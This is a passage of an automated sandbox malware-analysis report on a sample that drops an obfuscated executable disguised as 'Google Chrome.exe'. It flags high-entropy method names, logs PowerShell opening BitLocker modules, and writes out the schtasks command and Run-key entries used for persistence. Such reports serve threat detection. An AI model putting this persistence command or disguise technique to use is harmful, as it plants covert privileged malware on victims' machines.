            Source: Google Chrome.exe.0.dr, SMSgUiSVv3VmiBEwi2DMT63wt7smZiXjq0LioRiB1et93rMTrPHdUXWiqvmZhjDIhf9bNc6DkVqdsNh.csHigh entropy of concatenated method names: 'v4ZaC3YJaDnKAcqPNiTDJdisjmBFS5WXPaTQYMgrhJvWXoCRGFJn0zmmzFZySiNVggYJwmsIybD1scs', 'Hpv16SwIQVqRdK6qWRiZ3JQmu3HPFVbNQonGCvL', '_95AMRUssYAYGzjL4LVgehi95RPcWTVVYZxLtBLF', 'zPIPGJ09wvBP5Z8HDKUekK6i2rJWcznxRlXDFka', 'eTo2NrPKUY1QPGmFryFFAGeYxFwk4hyCKps9r1C'
            Source: Google Chrome.exe.0.dr, gxVelPSmWHEgdGj0TSDviwCJkIdSq.csHigh entropy of concatenated method names: 'UuyoGAMxy5X1LShR3Vp5N3Lg8Ot8f', 'wTNnjbm4dosdHJ6Wj8w07OOmTZGcp', 'fRPMXtMldfe8W1IQFD4NQSoh1b8gf', 'FdsWqwmX9mP5MXl2fa7W7J0uI1Rvhm9ydiQkumcQYtwJvYePKF1Os6gRx3orBw', '_4XwnGqJMG9DfviIj1jrbf7vMuLpEOm2Ej5QTCYBRLHWsOT7qxqd5fQumDKM61W', 'R6k4ksdcevQhxfnl6og2dN7YPGXvXPablOKAhUNDbSHg2ltruPHwFlidYNzRSu', 'RfNcNaTo7R6KAr4Qrf1J9X', 'o7SERyRBRKbOvOozRX3x8F', 'tg6cKK1YTYGdjNpXh5v4BZ', '_3cu2UNa47DDJ9O9bcKoAc8'
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.csHigh entropy of concatenated method names: 'eKfSIvLNVPlS3ChT0tpFTdrW0dMOPwHgqLoU4kdy6RCEisgxwybcIXGmZyLN7t', 'pcHmWoBW3GjFu1DUMkppEeaiX6XUR0coTwroZbVE2JqKW90S2RZPxFgYQPfqEc', 'UO9dzdpbqbL2ZT2Fns49RE5QogdH4ab8LGxhOV435rawSkpVinsiOR4R3SWMvc', 'aSBRAyHpdNaTBOdvbXg3rAjFrUlvJQ3qq4hv7LMJ8KLFHzbOmbJImTlNMPGmVM', 'jPTgRdypBu1pBpzAekAgSooyNRNHPjQrE4h87PfeSIcT9LGxpJeR9Bod3owQ9R', 'dxO8gQ4NsiLVLpAvYs11Guj6Wag7tBEwp3F1q6gUa5J6pR0CnX60WIy4e3EPlI', 'ZlW8bdapzGNwOhDtTL1G6GYOYnfio06CD1N7YHpwc2JUbKwMGeg88gtlrq3Pi4', 'Tm856ZsdTQgP90WAo0kVcpRBCfmk0MX1fGcBSGiH4spQo0wwlW2Ji4xv55KaBX', 'ptrY1L6Idz32UGpfhjcojN3OMMKojnre0rTTEYHCoexxBGTrtiifcafNP1VTnu', 'g6zcRjuZf48JsGj8dtGClKqn05hvb7ffaiZzmv8Hh8qmprOYZ4mrHN2C58ihy4'
            Source: Google Chrome.exe.0.dr, J98X1BFg5gJL3LEHshTwd7ce57sCLsSpHnQqNrNz84Npmlezw2ixv8EEP5lxKEpatP2fuOektELGGi3GtcfrtkZaIfjYLk.csHigh entropy of concatenated method names: 'wZBM5ojQGg2RjahBa0WkrFlLdUlrceKHzCh8k7cn9VhFqGSrOpBb52KtHrihcqLeWB9gTNfWkLbuXDDcZq8qqsINfEOno2', 'wt8jkByqmQcTZ14EKz0D1CJHwfO6sWgoMjwYgBl9X6qFtey5tYJD9hWYzD2etV50MzK8gYiiLOFX7hP97LPWmfBdUvcBVV', '_1Yvd7EP7SB6xtR2aA4XS3q6pEV9psxrWoS51QDeTtLjnW6csAzoFchtQZ0Hy3QALOkJtI85STN8Ikrd8Eg8oRb0GpDudYX', '_2gBhZ5BoLgO7u9tA5Bs1kbvrp5UPsdypzngGLrlO1dQRDxCFsXPJSaa0xACeedejo8MU60z6sAvHris7MZEbzyNfW6IIIu', 'qfgQB4qqEeK9tpNoSXUPndeHk4lXo16H6Knuuy70v9O123Xq3FKSyrgr6f9XnBpU52MMjRwAEDm7DbOWKOfLPxoZ7dYZXF', 'YTM9aN9h740QuL85XhcEiyOeKSEiwEpfDqbftaEUZgdWHI8mB8I28TszOAfkBOwpSDTANckW5pso3Un1inNHIJS9zV4JKl', 'Gxd5xXvz2rvgslCHArV2lXa8jegIsnWSOkAajwjt5VdyIr3I622JavRq7K1Dw27ATUa01rDFh4EAMEFjpccLELbCcEZ7IQ', 'hb6xelOkw13KbjQ9m71WiKLtmvsmR1ST5Bl6Ej1tzVynu5mszrwrNKehECVG6UVK9i48wAvCWoQekcL4wiiXNqT4nxmUPD', 'gpLJRiK9Rfsna9Ipj6kjn3mIDnNYGHmEoNuuhxKpzLY6kiWroTybdagMIZIOpWGqJc8lrFSsqkOndqyPFc9paKtPjYY3n2', 'ZFlK2bqHQgKtiWRVpSD9tlolsspNausjEn9BpNuEIennHCiWaeKnnwHUBz1k96JO7nBXRyKync4TXdGdPYENLFVVOjIcIh'
            Source: Google Chrome.exe.0.dr, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.csHigh entropy of concatenated method names: '_1SeOnvg2opDAPsTRUItiyarIPhcivQDw58fw5sIDXHH9hkbVNR6tBJbyrzqoF15r6s39DnPDvVYRZsE', 'GI7actamk5DaZIvBTBSGE6BKt4OMXEURZS1ihUyGCFpREbHt0XLcZKvxYeZj8A28nOsX0h4VUDimPIK', 'fBM7Vf76rL4NxUgLIUcHalZYOfyKuhj7SKCuOpOX0LPwgK3aM7cj4PvORUYAgcubV2jlJefyugaKcv6', 'Q4zTAi9G7jn5vyBK1cmEpk54abk9d2RPMamwhJ5B56XXKAz9xzbuwMKfKW8nUCF1UCYekUp1MzGIDUQ', '_2S8DHJAELWwXKGLXTElV2YhAAWpEnVzn4sj2lK7SSGXtzKKSlQ8eGTAzcBstZbcuY2eMXPCzxx0wQzg', 'vY1LbThbKHuRexLVDjmWCWr8e1Qfxka04LEvgGDhxAxf3rCtUcyYufCk1UQo0fJt6XG1EgX36hTPIdy', 'uOcpFnXWyqtLDFG6xHuQpl4OoKNJNCfSbiJcp7QEcpziaOu32vif4yOca4QiiaGqKgpRuv4DKmi8ZZl', 'A2kpZzLKth0vkyLZawo5qtIB5n0tIE5aZF1YKk4zNcMSYk617daNSvAVNpLIQTC1mLwbNibhrE1x9ug', '_8S4mWXblVKfCSFlBSfxIAkBmCKQ1VhdFzZeS02W1YWpVNxNuKvmsMwHfRMW96JvkG8QVHcNDKiDqFFC', 'htUAjReymaUvK5qkAX1YQxbzo6VvIEqHBKL4iaZPZf9ZzLo8ulBehcqNuervWpzgeNTm0cvvxACqVMA'
            Source: Google Chrome.exe.0.dr, EIPsVow9UCeNztykmrhINOiUil0Z52Gi3H9Gbg0oawiqwjz7kGFYijU1XPu2hAqcmAN7jbnGDMeOWHQpPyjCppdxYWrLcF.csHigh entropy of concatenated method names: '_1gfP3s9GmHdjwlxEFWeY7B9aoMNhEANDttTs2tpukKTu4MjJ8sIfETZxRkx1cj62b5Zjnl3GNQDADAiFjNQ9i8EfzMt8lF', '_65xDJzJGgKfGCfbaH8yFcgC9A2PbWh2edZTyiL1v26AyyxvYn685JSiqC7zPYTTQyoMF5otVfxaHtcu', 'bWW5eN9JpyUHVz07OGzHwM2Or9LlpbZXL2gRKfw5Rt9fG2xetFYi4lTqR7JrrQj8u1KIvLz4Tw8ece0', '_7FfoN83I62Qozf5uY6VK5UeISxgSpAQ7bEMgJ317skvbSBxmSnKuqax2XrKwlrRe6QCzyWClxOuW7i7', 'MIzCUJYNn4A5EKsGfaX5PMX1VXDXi9sNMMnCfxq', 'KXJ26WZ2qeMh1dR1og13OPzfRT93uDQDQ3qMB4U', 'iDO0UXmoXeLZce2DSGeFDXveCA9Xh83hKE1uKy4', 'AXx7UD5abpOMxLIMV26D9q45tPPe1CjgXdtS4h5', 'PlcfdaIeVxYZf2VJSRplvYjIE0izEPRoPGHqJ9U', '_6Vpjln0moI6OAarOC7UbjdR3P99tk8UuRThgwH5'
            Source: Google Chrome.exe.0.dr, khpJTONaip9rT88b3VfF2YRz7tYSJsVeufU9NBWttPrjMfB7GOKq1mB11RyuI1.csHigh entropy of concatenated method names: 'QN0cTZO60jBqUSOguU6PP3nr0BE9aMV62uvv5wDmbnw2RuMSW98lV9SiTZkF0BQoOp57Tl5Rzll0nnPnYGuDB9v9jpHGb6', 'itYLttotGEqSiKH8z86Oy96Fw8WrbsMDhw1WvDu', 'PUhk1m505bp6HQgHvUorAUwpL5IiXbxWcYveDkr', 'NGBjajTaeK0vlsZi9iSxRBTvZ2g9cSVsCKlW4QJ', 'DJm0WGqaQjKD7TXVer9qVnM0gotGEE06VyYzWCa'
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile created: C:\Users\user\AppData\Local\Google Chrome.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: C:\Users\user\Desktop\ra66DSpa.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Google ChromeJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Google ChromeJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
